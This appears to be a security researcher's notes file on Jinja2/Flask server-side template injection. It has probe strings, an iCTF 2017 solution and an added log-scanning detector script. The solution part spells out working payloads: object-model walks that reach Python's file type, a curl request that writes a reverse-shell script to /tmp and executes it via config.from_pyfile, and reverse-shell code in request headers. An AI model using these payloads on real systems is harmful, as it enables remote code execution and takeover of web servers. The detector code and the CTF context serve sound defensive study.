template_injection.txt
55 lines (36 loc) · 2.16 KB
https://twitter.com/Alra3ees/status/1087717418057809920
https://0day.work/jinja2-template-injection-filter-bypasses/
a{{bar}}b -> ab or error (an undefined variable renders as empty or throws)
a{{7*7}}b -> 49
{var} ${var} {{var}} <%var%> [%var%] -> with Flask, {{var}} was gone afterwards (Jinja2 renders an undefined variable as an empty string)
{var1} ${var2} {{var3}} <%var4%> [%var5%]
basically check everything that is reflected back, as with XSS
also check the URL itself (404 page ...)
https://gist.github.com/quantumfoam/fec4ab9083133523f489
https://github.com/epinna/tplmap
iCTF 2017 (flasking unicorn):
their solution
curl -g 'localhost:8080/?next={{request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[6]],request.headers[request.headers.keys()[6]][5]).write(request.headers[request.headers.keys()[4]])}}{{config.from_pyfile(request.headers[request.headers.keys()[6]])}}' \
  -H "x-f: /tmp/w" \
  -H 'x-p: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
(-g turns off curl's URL globbing so the {} and [] in the query string are sent literally; the x-f value "/tmp/w" doubles as the file path and, via [5], as the "w" write mode)
object:        request.__class__.__mro__[8]
file:          request.__class__.__mro__[8].__subclasses__()[40]   (the Python 2 builtin file type; the __mro__ and __subclasses__() indices depend on the interpreter version)
file.open():   request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]])
file.read():   request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]]).read()
file.write():  request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[0]],request.headers[request.headers.keys()[4]]).write(request.headers[request.headers.keys()[2]])
' caused endless problems .... hence the third header, keys()[2] (or, much better, slice a character out of another header: other_header[x])
request.headers[request.headers.keys()[0]]
request.headers[request.headers.keys()[2]]
request.headers[request.headers.keys()[4]]
-H "file: /tmp/code"
-H 'content: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("localhost",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-H "write: w"
code execution with:
curl -v -g "localhost:8080/?next={{config.from_pyfile(request.headers[request.headers.keys()[0]])}}" -H "file: /tmp/code" -H "content: 123"
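Defender-side counterpart to the probe list and the object-walk payloads above, as an added example (my code, not part of these notes or the iCTF solution): scan_log() flags decoded request parameters that carry the template delimiters from the probe list, escalating when the value walks the Python object model (__class__, __mro__, __subclasses__) or calls config.from_pyfile, and classify_response() applies the a{{7*7}}b check to a response body to tell "evaluated" from "reflected" and from the Flask "{{var}} was gone" case. The combined-log-format lines are constructed, and the log format is an assumption; adjust REQUEST_LINE for another server.

```python
"""Log-side and response-side checks for the SSTI probes in the notes above.

Added example, not part of the original notes. SAMPLE_LOG is constructed traffic.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-log-format lines (assumed format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2019:10:00:01 +0000] "GET /?next=%7B%7B7*7%7D%7D HTTP/1.1" 200 49 "-" "curl/7.64.0"',
    '10.0.0.5 - - [12/Jan/2019:10:00:02 +0000] "GET /?next=%7B%7Brequest.__class__.__mro__%5B8%5D%7D%7D HTTP/1.1" 200 512 "-" "curl/7.64.0"',
    '10.0.0.9 - - [12/Jan/2019:10:00:03 +0000] "GET /?next=/dashboard HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2019:10:00:04 +0000] "GET /search?q=price+%24%7B100%7D HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

REQUEST_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD|PUT|DELETE|PATCH) (\S+) HTTP/[\d.]+"'
)
# Delimiters from the notes' probe list: {{var}} ${var} <%var%> [%var%].
# Single-brace {var} is deliberately left out: it also matches ordinary JSON in query strings.
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%.*?%>|\[%.*?%\]", re.S)
# Arithmetic canary such as {{7*7}}.
ARITH_PROBE = re.compile(r"\{\{\s*\d+\s*[*+-]\s*\d+\s*\}\}")
# Object-model walking (__class__, __mro__, __subclasses__) and config.from_pyfile, as in the notes.
OBJECT_WALK = re.compile(r"__[A-Za-z]+__|from_pyfile")


def severity(value: str):
    """Return None for benign input, otherwise the most serious pattern class present."""
    if not TEMPLATE_SYNTAX.search(value):
        return None
    if OBJECT_WALK.search(value):
        return "sandbox-escape"
    if ARITH_PROBE.search(value):
        return "arith-probe"
    return "template-syntax"


def scan_log(lines):
    """Return one finding per suspicious decoded path or query parameter."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue  # unparseable line; a real deployment should count these
        ip, target = m.groups()
        parts = urlsplit(target)
        # Decode before matching: the probes arrive percent-encoded.
        candidates = [("<path>", unquote(parts.path))]
        candidates += parse_qsl(parts.query, keep_blank_values=True)
        for name, value in candidates:
            sev = severity(value)
            if sev:
                findings.append({"ip": ip, "param": name, "value": value, "severity": sev})
    return findings


def classify_response(probe: str, body: str) -> str:
    """Apply the notes' a{{7*7}}b check: was the expression evaluated, reflected, or stripped?"""
    m = re.fullmatch(r"(.*?)\{\{\s*(\d+)\s*([*+-])\s*(\d+)\s*\}\}(.*)", probe, re.S)
    if not m or not (m.group(1) or m.group(5)):
        raise ValueError("probe must be wrapper text around one {{N op N}} expression")
    pre, a, op, b, post = m.groups()
    result = {"*": int(a) * int(b), "+": int(a) + int(b), "-": int(a) - int(b)}[op]
    if f"{pre}{result}{post}" in body:
        return "evaluated"   # the engine ran the expression: template injection confirmed
    if probe in body:
        return "reflected"   # literal echo, XSS-style reflection rather than SSTI
    if f"{pre}{post}" in body:
        return "stripped"    # expression swallowed (the Flask "{{var}} was gone" case)
    return "absent"


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:16} {f['ip']:10} {f['param']}={f['value']!r}")
    print(classify_response("a{{7*7}}b", "<p>a49b</p>"))
```

The severity ladder mirrors the notes' progression: any template delimiter is worth a look, an arithmetic canary means someone is actively testing, and a dunder walk or from_pyfile call is the exploitation stage and should page someone. Matching runs on decoded values because the probes reach the server percent-encoded.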